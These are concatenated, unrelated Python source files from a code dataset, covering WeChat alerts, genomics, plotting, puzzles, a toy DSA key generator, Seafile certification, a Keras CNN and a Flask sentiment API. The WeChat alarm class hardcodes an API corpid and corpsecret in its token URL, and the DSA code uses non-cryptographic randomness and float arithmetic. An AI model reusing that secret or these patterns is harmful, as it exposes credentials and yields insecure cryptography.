+{"seq_id":"50979045","text":"import json\nimport logging\nimport time\n\nimport requests\n\n# Get an instance of a logger\nlogger = logging.getLogger(__name__)\n\n\nclass WexinAlarm:\n def __init__(self):\n self.token = \"\"\n self.expired = int(time.time())\n\n def refresh_token(self):\n now = int(time.time())\n if now < self.expired and len(self.token) > 0:\n return\n\n url = \"https://qyapi.weixin.qq.com/cgi-bin/gettoken?corpid=ww2ef294fd1f043429&corpsecret=deLb5gd4hiP-l5ekwbEZ6h1WZbGz43VPOWgqwRrfqIM\"\n\n response = requests.request(\"GET\", url, headers={}, data={})\n\n if response.status_code > 300:\n logger.error(\"error status code for weixin token: %d\", response.status_code)\n return\n\n resp_obj = json.loads(response.text)\n if resp_obj['errcode'] != 0:\n logger.error(\"failed to get token: %s\", resp_obj['errmsg'])\n return\n\n self.token = resp_obj['access_token']\n self.expired = int(time.time()) + resp_obj['expires_in']\n\n def send_msg(self, users, msg):\n self.refresh_token()\n url = \"https://qyapi.weixin.qq.com/cgi-bin/message/send?access_token=\" + self.token\n\n payload = {\n \"touser\": users,\n \"toparty\": \"1\",\n \"msgtype\": \"text\",\n \"agentid\": 1000002,\n \"text\": {\n \"content\": msg\n },\n \"safe\": 0,\n \"enable_id_trans\": 0,\n \"enable_duplicate_check\": 0,\n \"duplicate_check_interval\": 1800\n }\n headers = {\n 'Content-Type': 'application/json'\n }\n\n resp = requests.request(\"POST\", url, headers=headers, data=json.dumps(payload))\n if resp.status_code >= 300:\n logger.error('failed to send message to wechat: %s', resp.text)\n","sub_path":"schema/alarms.py","file_name":"alarms.py","file_ext":"py","file_size_in_byte":1812,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"459939360","text":"#!/usr/bin/env python2.7\n\nimport os, sys\nimport string\nimport ngb_functions\nfrom pysam import VariantFile\nfrom pysam import FastaFile\nfrom optparse import OptionParser\nfrom collections import defaultdict\nfrom collections import namedtuple\nfrom collections import OrderedDict\n\ndef run_process(opts, inputvcf):\n outputvcf = opts.output\n\n # Open VCF\n vcf_in = VariantFile(inputvcf)\n\n # Add INFO to Header\n vcf_in.header.info.add(\"TYPE\",\"A\",\"String\",\"The type of allele, either snp, ins, del, or complex.\")\n\n # Add FORMAT to Header\n vcf_in.header.formats.add(\"NGB_DP\",\"1\",\"Integer\",\"Approximate read depth; some reads may have been filtered\")\n vcf_in.header.formats.add(\"NGB_AO\",\"A\",\"Integer\",\"Alternate allele observation count\")\n vcf_in.header.formats.add(\"NGB_RO\",\"1\",\"Integer\",\"Reference allele observation count\")\n vcf_in.header.formats.add(\"NGB_VAF\",\"A\",\"Float\",\"Allele fractions of alternate alleles in the tumor\")\n\n # Write VCF\n vcf_out = VariantFile(outputvcf if outputvcf else '-','w',header=vcf_in.header)\n\n for record in vcf_in.fetch():\n chrom = record.chrom\n pos = record.pos\n ref = record.ref\n alts = record.alts\n\n variant_type_list = list()\n ngb_dp_list = list()\n ngb_ao_list = list()\n ngb_ro_list = list()\n ngb_vaf_list = list()\n tmp_dp = sum(record.samples[0]['AD'])\n tmp_ro = record.samples[0]['AD'][0]\n for n,alt in enumerate(alts):\n # Get Variant TYPE (freebayes format)\n ret = ngb_functions.pairdiff(ref,alt)\n vartype = ret['variant_type']\n variant_type_list.append(vartype)\n\n # Get DP,AO,RO,VAF\n tmp_vaf = float(record.samples[0]['AD'][(n+1)]) / float(tmp_dp)\n tmp_ao = int(record.samples[0]['AD'][(n+1)])\n ngb_dp_list.append(tmp_dp)\n ngb_ao_list.append(tmp_ao)\n ngb_vaf_list.append(tmp_vaf)\n\n if variant_type_list != []:\n #info_value = ','.join(str(e) for e in variant_type_list)\n record.info['TYPE'] = variant_type_list\n if ngb_dp_list != []:\n record.samples[0][\"NGB_DP\"] = ngb_dp_list[0]\n record.samples[0][\"NGB_AO\"] = tuple(ngb_ao_list)\n record.samples[0][\"NGB_RO\"] = tmp_ro\n record.samples[0][\"NGB_VAF\"] = tuple(ngb_vaf_list)\n\n # Write VCF\n vcf_out.write(record)\n # Run End\n\nif __name__ == '__main__':\n usage = \"\"\"usage: %prog [options] \"\"\"\n parser = OptionParser(usage=usage)\n parser.add_option(\"-o\", \"--output\", dest=\"output\", help=\"Output VCF File (default : stdout)\", default=\"\")\n\n (options, args) = parser.parse_args()\n if len(args) < 1:\n parser.print_help()\n sys.exit(1)\n\n original_vcf = args[0]\n run_process(options, original_vcf)\n","sub_path":"pipelines/utils/ngb_addTypeInfoNGBFormat.py","file_name":"ngb_addTypeInfoNGBFormat.py","file_ext":"py","file_size_in_byte":2836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"47410228","text":"# The read4 API is already defined for you.\n# @param buf, a list of characters\n# @return an integer\n# def read4(buf):\n\nclass Solution(object):\n def __init__(self):\n self.prev = []\n\n def read(self, buf, n):\n \"\"\"\n :type buf: Destination buffer (List[str])\n :type n: Maximum number of characters to read (int)\n :rtype: The number of characters read (int)\n \"\"\"\n eof, total, tmp = False, 0, [''] * 4\n if self.prev:\n count = min(len(self.prev), n)\n buf[:count] = self.prev[:count]\n total += count\n self.prev = self.prev[count:] if count < len(self.prev) else []\n \n while not eof and total < n:\n count = read4(tmp)\n eof = count < 4\n if count > n-total:\n self.prev = tmp[n-total:count]\n count = n-total\n buf[total:total+count] = tmp\n total += count\n\n return total\n","sub_path":"python_solutions/158-read-n-characters-given-read4-ii-call-multiple-times.py","file_name":"158-read-n-characters-given-read4-ii-call-multiple-times.py","file_ext":"py","file_size_in_byte":968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"248769983","text":"\"\"\"\nAuthor: Andrew Harris\nPython 3.8.3\n\"\"\"\nimport argparse\nfrom pathlib import Path\n\nimport pandas as pd\nimport plotly\nimport plotly.graph_objs as go\nimport plotly.express as px\nfrom plotly.subplots import make_subplots\n\n\ndef _read_file_to_df(f):\n \"\"\"Read in file based of suffix\"\"\"\n if f.suffix == \".tsv\":\n df = pd.read_csv(f, sep='\\t')\n return df\n elif f.suffix == '.csv':\n df = pd.read_csv(f, sep=',')\n return df\n\n\ndef make_plot(df, outdir, fname):\n # ---- df melt + organize ----\n df = df.melt(id_vars=[\"Chromosome\", \"Start\", \"Stop\"])\n df.columns = [\"Chromosome\", \"Start\", \"Stop\", \"Sample\", \"p_distance\"]\n df.sort_values(by=[\"Chromosome\", \"Start\", \"Stop\"], inplace=True)\n\n # ---- collect df info ----\n chromosomes = [i for i in df['Chromosome'].unique()]\n samples = [i for i in df['Sample'].unique()]\n samples.sort(reverse=True)\n\n # ---- Get max p_distance value to set y-axis range ----\n y_max = float(df[\"p_distance\"].max() * 1.1) # increase 10% above max\n x_max = df[\"Stop\"].max() * 1.01 # increase 10% above max\n\n colors = px.colors.qualitative.Prism\n\n base_graph_height = 150\n\n fig = make_subplots(\n rows=len(chromosomes),\n cols=1,\n x_title=\"Position\",\n y_title=\"p-distance\",\n row_titles=chromosomes,\n vertical_spacing=0.01,\n row_heights=[base_graph_height] * len(chromosomes),\n )\n\n for placeholder, sample in enumerate(samples):\n legend_flag = True\n for row, current_chrom in enumerate(chromosomes, start=1):\n filt = (df['Chromosome'] == current_chrom) & (df[\"Sample\"] == sample)\n sample_chromosome_data = df[filt]\n # Make figure\n fig.add_trace(\n go.Scatter(\n x=sample_chromosome_data['Stop'],\n y=sample_chromosome_data['p_distance'],\n mode='lines',\n legendgroup=str(sample),\n name=sample,\n line=dict(\n color=colors[placeholder],\n width=float(0.75)\n ),\n showlegend=legend_flag,\n ),\n row=row,\n col=1\n )\n legend_flag = False\n continue\n continue\n # ---- Update figure ----\n fig.update_layout(\n height=base_graph_height*len(chromosomes),\n template=\"simple_white\",\n margin=dict(\n l=60,\n r=10,\n b=60,\n t=0,\n pad=5\n ),\n legend=dict(\n orientation=\"h\",\n yanchor=\"bottom\",\n y=1,\n xanchor=\"left\",\n x=0,\n itemsizing='trace',\n title=\"\",\n ),\n font=dict(\n family=\"Arial, monospace\",\n size=12,\n ),\n annotations=[{\n \"font\": dict(\n family=\"Arial, monospace\",\n size=12,\n ),\n }]\n )\n fig.for_each_annotation(lambda a: a.update(text=a.text.split(\"=\")[-1]))\n fig.update_yaxes(range=[0.0, y_max], fixedrange=True)\n fig.update_xaxes(range=[0, x_max])\n html_filename = outdir / f\"{fname}.html\"\n fig.write_html(str(html_filename))\n return\n\n\ndef main():\n parser = argparse.ArgumentParser(\n description='Creates full genome p-distance plot',\n )\n parser.add_argument(\n '-i', \n '--input', \n type=str, \n action='store', \n required=True, \n help='Input p-distance file'\n )\n parser.add_argument(\n '-o', \n '--output', \n type=str, \n action='store', \n required=True, \n help='Output location (i.e directory)',\n )\n args = parser.parse_args()\n \n # --- input variables ---\n INPUT_FILE = Path(args.input)\n OUTPUT_DIR = Path(args.output)\n\n # --- read file + plot ----\n pdist_df = _read_file_to_df(INPUT_FILE)\n make_plot(pdist_df, OUTPUT_DIR, INPUT_FILE.stem)\n return\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"graphing_scripts/full_genome_p_distance_plot.py","file_name":"full_genome_p_distance_plot.py","file_ext":"py","file_size_in_byte":4121,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"89309813","text":"import time\r\n\r\ntStart = time.clock()\r\n\r\npalindromes = []\r\n\r\nfor j in range(100,1000):\r\n\r\n for i in range(100,1000):\r\n \r\n palinCheck = j * i\r\n \r\n if palinCheck - 100000 > 0:\r\n \r\n copyTest = palinCheck\r\n \r\n digit1 = palinCheck//100000\r\n copyTest -= digit1*100000\r\n digit2 = copyTest//10000\r\n copyTest -= digit2*10000\r\n digit3 = copyTest//1000\r\n copyTest -= digit3*1000\r\n digit4 = copyTest//100\r\n copyTest -= digit4*100\r\n digit5 = copyTest//10\r\n copyTest -= digit5*10\r\n digit6 = copyTest//1\r\n \r\n if digit1 == digit6 and digit2 == digit5 and digit3 == digit4:\r\n palindromes.append(palinCheck)\r\n \r\npalindromes.sort(key=None, reverse=True) \r\nprint(palindromes[0])\r\ntEnd = time.clock()\r\nprint(tEnd - tStart)\r\n\r\n","sub_path":"K/Q4K.py","file_name":"Q4K.py","file_ext":"py","file_size_in_byte":940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"395111835","text":"import sys\nimport math\nfor line in sys.stdin:\n line=line.replace('\\n',\"\")\n if line!=\"0:00\":\n line=line.split(':')\n minute=float(line[1])*6\n sati=(float(line[0])%12)*30+(minute/12)\n if sati>minute:\n if(sati-minute<=180):\n print(\"%.3f\" %(sati-minute))\n else:\n print(\"%.3f\" %(360-sati+minute))\n else:\n if(minute-sati<=180):\n print(\"%.3f\" %(minute-sati))\n else:\n print(\"%.3f\" %(360-minute+sati))\n else:\n break\n ","sub_path":"uva579.py","file_name":"uva579.py","file_ext":"py","file_size_in_byte":569,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"213703443","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Feb 20 13:41:52 2017\n\n@author: Skyler Norgaard and Jacob Scott... not Cadigan\n\"\"\"\n\nimport random\nimport sympy\n\n\n#these three methods are used to generate the Global Public Key Components\n\n#generating random numbers that fit the condition\n#will want to tell user what i values are value in our interface\n#i must be between 0 and 8!\ndef pgen(i):\n #make sure that the user generated L value is <=1024\n if(512+64*i<=1024):\n L = 512+64*i #generate L value to use for bounds\n a=2**(L-1) #generate lower bound\n b=2**L #upper bound\n\n #generates number in range 2^(L-1)<2^(L)\n p = random.randrange(a+1,b,1)\n #check if p is prime, if not continue generating until it is\n while not sympy.isprime(p):\n p = random.randrange(a+1,b,1)\n return p\n \n else:\n print(\"Enter valid i value!\")\n \n#I dont think it's the logic, I think it's that\n#the q being a prime divisor condition is never met. Or it just takes\n#way too long to generate...\ndef qgen(p):\n #make sure prime is entered\n if(sympy.isprime(p)):\n #generate random q such that 2^159 1:\n h = random.randrange(2,p-1)\n g = (h**((p-1)/q))%p\n return g\n \n\n#these methods are used to generate the public and private key\ndef privatekey(q):\n return random.randrange(1,q)\n \ndef publickey(g,x,p):\n return (g**x)%p\n \np = pgen(8) \nprint(qgen(p))\n\n#print(\"Should say true \" + str(((p-1)%q)==0))\n#print(\"Shouls say true \" + str(sympy.isprime(q)))\n ","sub_path":"finalProject.py","file_name":"finalProject.py","file_ext":"py","file_size_in_byte":1950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"228584263","text":"import logging\nfrom seahub.api2.utils import json_response\nfrom seahub import settings\n\nfrom keeper.catalog.catalog_manager import get_catalog\n\nfrom django.http import JsonResponse\nimport sys\nimport hashlib\nfrom seafobj import commit_mgr, fs_mgr\nfrom seaserv import seafile_api, get_repo\n\nimport time\n\nfrom keeper.models import BCertificate\nfrom seahub.notifications.models import UserNotification\nimport json\nfrom seahub.base.templatetags.seahub_tags import email2nickname\nfrom seahub.utils import send_html_email, get_site_name\nfrom django.utils.translation import ugettext as _\n\n# Get an instance of a logger\nlogger = logging.getLogger(__name__)\n\nMSG_TYPE_KEEPER_BLOXBERG_MSG = 'bloxberg_msg'\n\ndef hash_file(repo_id, path, user_email):\n file = get_file_by_path(repo_id, path)\n BUF_SIZE = 65536 # lets read stuff in 64kb chunks!\n file_hash_inc = hashlib.sha256()\n stream = file.get_stream()\n\n while True:\n data = stream.read(BUF_SIZE)\n if not data:\n break\n file_hash_inc.update(data);\n\n data = {\n 'certifyVariables': {\n 'checksum': file_hash_inc.hexdigest(),\n 'authorName': email2nickname(user_email),\n 'timestampString': str(time.time()),\n }\n }\n return data\n\ndef get_file_by_path(repo_id, path):\n repo = seafile_api.get_repo(repo_id)\n dir = fs_mgr.load_seafdir(repo.id, repo.version, get_commit_root_id(repo_id))\n paths = [_f for _f in path.split(\"/\") if _f]\n for path in paths:\n dir = dir.lookup(path)\n return dir\n\ndef get_commit_id(repo_id):\n repo = seafile_api.get_repo(repo_id)\n commits = seafile_api.get_commit_list(repo.id, 0, 1)\n return commits[0].id\n\ndef get_commit_root_id(repo_id):\n repo = seafile_api.get_repo(repo_id)\n commits = seafile_api.get_commit_list(repo.id, 0, 1)\n commit = commit_mgr.load_commit(repo.id, repo.version, commits[0].id)\n return commit.root_id\n\ndef create_bloxberg_certificate(repo_id, path, transaction_id, created_time, checksum, user_email):\n commit_id = get_commit_id(repo_id)\n obj_id = BCertificate.objects.add_bloxberg_certificate(transaction_id, repo_id, path, commit_id, created_time, user_email, checksum)\n send_notification(repo_id, path, transaction_id, created_time, user_email)\n return obj_id\n\ndef certified_with_keeper(repo_id, path):\n commit_id = get_commit_id(repo_id)\n return BCertificate.objects.has_bloxberg_certificate(repo_id, path, commit_id)\n\ndef send_notification(repo_id, path, transaction_id, timestamp, user_email):\n BLOXBERG_MSG=[]\n msg = 'Your data was successfully certified!'\n msg_transaction = 'Transaction ID: ' + transaction_id\n file_name = path.rsplit('/', 1)[-1]\n BLOXBERG_MSG.append(msg)\n BLOXBERG_MSG.append(msg_transaction)\n\n UserNotification.objects._add_user_notification(user_email, MSG_TYPE_KEEPER_BLOXBERG_MSG,\n json.dumps({\n 'message':('; '.join(BLOXBERG_MSG)),\n 'transaction_id': transaction_id,\n 'repo_id': repo_id,\n 'link_to_file': path,\n 'file_name': file_name,\n 'author_name': email2nickname(user_email),\n }))\n\n c = {\n 'to_user': user_email,\n 'message_type': 'bloxberg_msg',\n 'message':('; '.join(BLOXBERG_MSG)),\n 'transaction_id': transaction_id,\n 'repo_id': repo_id,\n 'link_to_file': path,\n 'file_name': file_name,\n 'author_name': email2nickname(user_email),\n 'timestamp': timestamp,\n }\n\n try:\n send_html_email(_('New notice on %s') % get_site_name(),\n 'notifications/keeper_email.html', c,\n None, [user_email])\n\n logger.info('Successfully sent email to %s' % user_email)\n except Exception as e:\n logger.error('Failed to send email to %s, error detail: %s' % (user_email, e))\n","sub_path":"seafile_keeper_ext/seafile-server-latest/seahub/keeper/bloxberg/bloxberg_manager.py","file_name":"bloxberg_manager.py","file_ext":"py","file_size_in_byte":3848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"349902875","text":"\"\"\"\n\n숫자 예제\nhttps://github.com/raghakot/keras-vis/blob/master/examples/vggnet/activation_maximization.ipynb\nhttps://github.com/raghakot/keras-vis\nhttps://raghakot.github.io/keras-vis/\n\n> 완성.. 이걸로 사용!!!\n\n\"\"\"\n\n\nfrom __future__ import print_function\n\n\nfrom keras.models import Sequential, Model\nfrom keras.layers import Dense, Dropout, Flatten, Activation, Input\n\nfrom keras import backend as K\n\n\"\"\"\nreference 1(17, IEEE) 모델\nhttps://www.kaggle.com/vishwasgpai/guide-for-creating-cnn-model-using-csv-file\n\"\"\"\nimport numpy as np # linear algebra\nimport pandas as pd # data processing, CSV file I/O (e.g. pd.read_csv)\nfrom keras.models import Sequential\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.layers import Flatten\nfrom keras.layers import BatchNormalization\nfrom keras.layers.convolutional import Convolution2D\nfrom keras.layers.convolutional import MaxPooling2D, AveragePooling2D\nfrom sklearn.preprocessing import LabelEncoder, OneHotEncoder\nfrom keras import backend as K\nimport tensorflow as tf\nfrom keras import applications as app\n\nsess = tf.Session()\nK.set_session(sess)\n\n\n\n\ndef dataset():\n # Read training and test data files\n train = pd.read_csv(\"../dataFiles/train_337_datafile2.csv\", encoding='utf-8', engine='python').values\n validation = pd.read_csv(\"../dataFiles/test_84_datafile2.csv\", encoding='utf-8', engine='python').values\n\n # Reshape and normalize training data\n # trainX = train[:, 1:].reshape(train.shape[0],1,128, 1152).astype( 'float32' )\n trainX = train[:, 2:147458].reshape(train.shape[0], 1, 128, 1152).astype('float32') # (2~147457)\n X_train = trainX / 255.0\n y_train = train[:, 1] # lable column is [1]\n\n # Reshape and normalize test data\n # testX = test[:,1:].reshape(test.shape[0],1, 128, 1152).astype('float32')\n testX = validation[:, 2:147458].reshape(validation.shape[0], 1, 128, 1152).astype('float32')\n X_test = testX / 255.0\n y_test = validation[:, 1]\n\n # from sklearn.preprocessing import LabelEncoder,OneHotEncoder\n from sklearn import preprocessing\n\n lb = preprocessing.LabelBinarizer()\n y_train = lb.fit_transform(y_train)\n y_test = lb.fit_transform(y_test)\n\n return X_train, y_train, X_test, y_test\n\n\n\n\n# return model\ndef get_model():\n model = Sequential()\n K.set_image_dim_ordering('th')\n\n # make the CNN model\n # layer 1: [filter = 16*16, channel =1, filter 수 = 32], activation fun = ReLu\n model.add(Convolution2D(32, 5, 5, border_mode='valid', input_shape=(1, 128, 1152), activation='relu')) # nb_filter, nb_row, nb_col\n # model.add(BatchNormalization())\n model.add(MaxPooling2D(pool_size=(4, 4))) # pooling1 : MaxPooling\n# model.add(AveragePooling2D(pool_size=(4, 4))) # pooling1 : MaxPooling\n\n# model.add(Dropout(0.2)) # size 커서 OOM error 생겨서 넣어 봄... and overfitiing 방지\n\n # layer 2: [filter = 9*9, channel =1, filter 수 = 32], activation fun = ReLu\n model.add(Convolution2D(64, 3, 3, activation='relu'))\n model.add(BatchNormalization())\n# model.add(Convolution2D(64, 3, 3, activation='relu'))\n# model.add(MaxPooling2D(pool_size=(2, 2))) # pooling1 : MaxPooling\n# model.add(AveragePooling2D(pool_size=(2, 2))) # pooling2 : AveragePooling\n\n\n model.add(Convolution2D(128, 3, 3, activation='relu'))\n model.add(MaxPooling2D(pool_size=(2, 2))) # pooling1 : MaxPooling\n # model.add(AveragePooling2D(pool_size=(2, 2))) # pooling2 : AveragePooling\n\n '''\n\n # layer 3: [filter = 5*5, channel =1, filter 수 = 32], activation fun = ReLu\n # model.add(Convolution2D(256, 3, 3, activation='relu'))\n # model.add(BatchNormalization())\n# model.add(MaxPooling2D(pool_size=(2, 2))) # pooling1 : MaxPooling\n # model.add(AveragePooling2D(pool_size=(2, 2))) # pooling1 : MaxPooling\n# model.add(Dropout(0.3)) # size 커서 OOM error 생겨서 넣어 봄...\n\n# model.add(Convolution2D(256, 3, 3, activation='relu'))\n# model.add(MaxPooling2D(pool_size=(2, 2)))\n # model.add(Convolution2D(256, 3, 3, activation='relu'))\n # model.add(BatchNormalization())\n\n\n\n '''\n\n\n model.add(Flatten())\n\n # model.add(Dense(24576, activation= 'relu' ))\n# model.add(Dense(4096, activation= 'relu' ))\n model.add(Dense(625, activation='relu'))\n model.add(Dense(256, activation='relu')) # 2^8\n model.add(Dense(10, activation='softmax', name='preds'))\n\n return model\n\n\n# https://tykimos.github.io/2017/09/24/Custom_Metric/\ndef single_class_precision(interesting_class_id):\n # 특정 클래스에 대한 정밀도를 평가하는 함수. 여러개의 클래스를 하나의 함수로 사용할 수 있게 interesting_class_id 인자 사용\n def prec(y_true, y_pred):\n class_id_true = K.argmax(y_true, axis=-1)\n class_id_pred = K.argmax(y_pred, axis=-1)\n precision_mask = K.cast(K.equal(class_id_pred, interesting_class_id), 'int32')\n class_prec_tensor = K.cast(K.equal(class_id_true, class_id_pred), 'int32') * precision_mask\n class_prec = K.cast(K.sum(class_prec_tensor), 'float32') / K.cast(K.maximum(K.sum(precision_mask), 1),\n 'float32')\n return class_prec\n\n return prec\n\n\ndef single_class_recall(interesting_class_id):\n # 클래스 별로 확인 할 때, 정밀도와 재현율 파악도 도움이 됨\n # 특정 클래스에 대한 재현율 평가\n def recall(y_true, y_pred):\n class_id_true = K.argmax(y_true, axis=-1)\n class_id_pred = K.argmax(y_pred, axis=-1)\n recall_mask = K.cast(K.equal(class_id_true, interesting_class_id), 'int32')\n class_recall_tensor = K.cast(K.equal(class_id_true, class_id_pred), 'int32') * recall_mask\n class_recall = K.cast(K.sum(class_recall_tensor), 'float32') / K.cast(K.maximum(K.sum(recall_mask), 1),\n 'float32')\n return class_recall\n\n return recall\n\n\ndef result(score, y_test, predic):\n trueD = []\n predicD = np.array(predic)\n\n for i in range(y_test.shape[0]):\n datum = y_test[i]\n decoded_datum = np.argmax(y_test[i]) # decode(y_test[i])\n trueD.append(decoded_datum)\n # print('decoded datum: %s' % decoded_datum)\n\n print('===' * 30)\n print(\"score : \", score)\n print('test(validation) data : ', len(y_test))\n print('predicD: ', predicD)\n print('trueD : ', trueD)\n\n count = 0\n for i in range(len(trueD)):\n if (trueD[i] == predicD[i]):\n count += 1\n\n print('---' * 30)\n\n print(\" 총 맞춘 예측 갯수 : \", count)\n print(\" 틀린 예측 갯수 : \", len(trueD) - count)\n print('===' * 30)\n\n\n##############\n\n\ndef train_visual(hist):\n # 학습과정 시각화\n import matplotlib.pyplot as plt\n\n plt.plot(hist.history['prec'], label='precision 1')\n plt.plot(hist.history['prec_1'], label='precision 1')\n plt.plot(hist.history['prec_2'], label='precision 2')\n plt.plot(hist.history['prec_3'], label='precision 3')\n plt.plot(hist.history['prec_4'], label='precision 4')\n plt.plot(hist.history['prec_5'], label='precision 5')\n plt.plot(hist.history['prec_6'], label='precision 6')\n plt.plot(hist.history['prec_7'], label='precision 7')\n plt.plot(hist.history['prec_8'], label='precision 8')\n plt.plot(hist.history['prec_9'], label='precision 9')\n\n plt.xlabel('epoch')\n plt.ylabel('precision')\n plt.legend(loc='lower right')\n plt.show()\n\n ############\n\n plt.plot(hist.history['recall'], label='recall 0')\n plt.plot(hist.history['recall_1'], label='recall 1')\n plt.plot(hist.history['recall_2'], label='recall 2')\n plt.plot(hist.history['recall_3'], label='recall 3')\n plt.plot(hist.history['recall_4'], label='recall 4')\n plt.plot(hist.history['recall_5'], label='recall 5')\n plt.plot(hist.history['recall_6'], label='recall 6')\n plt.plot(hist.history['recall_7'], label='recall 7')\n plt.plot(hist.history['recall_8'], label='recall 8')\n plt.plot(hist.history['recall_9'], label='recall 9')\n plt.xlabel('epoch')\n plt.ylabel('recall')\n plt.legend(loc='lower right')\n plt.show()\n\n\ndef result_visual(score):\n import numpy as np\n\n metrics = np.array(score[2:])\n idx = np.linspace(0, 19, 20)\n precision = metrics[(idx % 2) == 0]\n recall = metrics[((idx + 1) % 2) == 0]\n\n import matplotlib.pyplot as plt\n\n N = 10\n ind = np.arange(N)\n width = 0.35\n\n fig, ax = plt.subplots()\n prec_bar = ax.bar(ind, precision, width, color='r')\n recall_bar = ax.bar(ind + width, recall, width, color='y')\n\n ax.set_ylabel('Scores')\n ax.set_title('Precision and Recall')\n ax.set_xticks(ind + width / 2)\n ax.set_xticklabels(\n ('0 : 감사', '1: 괜찮다', '2: 사랑', '3: 기쁘다', '4: 미안', '5: 안되다', '6: 안녕', '7: 늦다', '8: 만나다', '9: 부끄럽다'))\n\n ax.legend((prec_bar[0], recall_bar[0]), ('Precision', 'Recall'))\n\n plt.show()\n\n\ndef cnnfeature_vis(model):\n from vis.visualization import visualize_activation\n from vis.utils import utils\n from keras import activations\n\n from matplotlib import pyplot as plt\n # %matplotlib inline\n plt.rcParams['figure.figsize'] = (18, 6)\n\n # Utility to search for layer index by name.\n # Alternatively we can specify this as -1 since it corresponds to the last layer.\n layer_idx = utils.find_layer_idx(model, 'preds')\n\n # Swap softmax with linear\n model.layers[layer_idx].activation = activations.linear\n model = utils.apply_modifications(model)\n\n # This is the output node we want to maximize.\n filter_idx = 0\n img = visualize_activation(model, layer_idx, filter_indices=filter_idx)\n plt.imshow(img[..., 0])\n\n for output_idx in np.arange(10):\n # Lets turn off verbose output this time to avoid clutter and just see the output.\n img = visualize_activation(model, layer_idx, filter_indices=output_idx, input_range=(0., 1.))\n plt.figure()\n plt.title('Networks perception of {}'.format(output_idx))\n plt.imshow(img[..., 0])\n\n # Visualizations without swapping softmax\n # Swap linear back with softmax\n model.layers[layer_idx].activation = activations.softmax\n model = utils.apply_modifications(model)\n\n for output_idx in np.arange(10):\n # Lets turn off verbose output this time to avoid clutter and just see the output.\n # Visualizations without swapping softmax\n img = visualize_activation(model, layer_idx, filter_indices=output_idx, input_range=(0., 1.))\n plt.figure()\n plt.title('Networks perception of {}'.format(output_idx))\n plt.imshow(img[..., 0])\n plt.show()\n\n################\n\n\n\ndef main():\n model = get_model()\n\n X_train, y_train, X_test, y_test = dataset()\n\n # Compile model\n# model.compile(loss='categorical_crossentropy', optimizer= 'adam', metrics=['accuracy']) # base\n\n\n\n\n model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy',\n single_class_precision(0), single_class_recall(0),\n single_class_precision(1), single_class_recall(1),\n single_class_precision(2), single_class_recall(2),\n single_class_precision(3), single_class_recall(3),\n single_class_precision(4), single_class_recall(4),\n single_class_precision(5), single_class_recall(5),\n single_class_precision(6), single_class_recall(6),\n single_class_precision(7), single_class_recall(7),\n single_class_precision(8), single_class_recall(8),\n single_class_precision(9), single_class_recall(9)])\n\n\n\n # model.fit(X_train, y_train, epochs=5, batch_size=512) # mini-batch : 64, 128, 256, 512 size(memory size에 맞춰) epochs=300\n hist = model.fit(X_train, y_train, epochs=50, batch_size=128) # mini-batch : 64, 128, 256, 512 size(memory size에 맞춰) epochs=300\n # small batch = 8\n\n\n # model save\n model.save('./models/model_1-2.h5')\n\n\n print('model summary : ', model.summary()) # model에 대한 정보(summary) 출력\n\n\n\n score = model.evaluate(X_test, y_test, batch_size=128)\n # predicD = model.predict(testX, verbose=1)\n predic = model.predict_classes(X_test, verbose=1)\n\n\n result(score, y_test, predic)\n train_visual(hist)\n result_visual(score)\n\n #cnnfeature_vis(model)\n\n\n\n\n K.clear_session() # 모델 닫기\n\n\n\n\n\nmain()\n\n\n\n'''\nif __name__ == '__main__':\n\n result(score, y_test, predic)\n train_visual(hist)\n result_visual(score)\n\n\n'''\n\n","sub_path":"code/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":13252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"458478756","text":"from flask import Flask, jsonify, request\nimport pickle\nimport sys\nimport numpy as np\nimport nlp_utils\nimport os \napp = Flask(__name__)\ntfidf_vect = pickle.load(open(os.path.join('.','tf_idf_review_vectorizer.sav'),'rb'))\nmodel = pickle.load(open(os.path.join('.','imdb_reviews_model.sav'), 'rb'))\n\n@app.route('/')\ndef home():\n return jsonify(data='Welcome Home')\n@app.route('/review_sentiment')\ndef review_sentiment():\n review = request.args.get('review','unknown')\n cleaned_review = nlp_utils.process_text(review)\n vectorized_review = tfidf_vect.transform([cleaned_review]).toarray()\n pred = model.predict_proba(vectorized_review)[0, 1]\n print(pred)\n n = np.random.randint(0,4)\n if review == 'unknown':\n results = [\"Try again and check your spelling pal\",\n \"Didn't quite catch that one\",\n \"Are you trying to trip me out\",\n \"Have another a go, may have been an input error\"]\n return jsonify(response=results[n])\n if pred > 0.70:\n results = [\"Wow, you sure are feeling positive about that!\",\n \"Awesome, there needs to be more happiness in the world!\",\n \"I'll definitely watch this one then, cheers for the heads up\",\n \"Smashing, sounds like a blast!\"]\n return jsonify(response=results[n], review = review)\n elif pred > 0.5 and pred < 0.7:\n results = [\"Sounds like you liked this one\",\n \"Pretty good film eh?\",\n \"I'm glad you had a good time\",\n \"Nice one bruvaaaa!\"]\n return jsonify(response=results[n], review = review)\n elif pred < 0.5 and pred > 0.2:\n results = [\"Sounds like this one was not your cup of tea\",\n \"I recommend you watch another film next time\",\n \"Not the best film you've ever seen then?\",\n \"Okay, put it in the past then. There's plenty of life ahead.\"]\n return jsonify(response=results[n],review = review)\n else:\n results = [\"Ok, it seems like you're really not that keen on this one..\",\n \"Sounds awful.\",\n \"Guess you won't be watching this again\",\n \"Oh okay...I would advise on you not watching this again?\"]\n return jsonify(response=results[n], review = review)\n\nif __name__ == 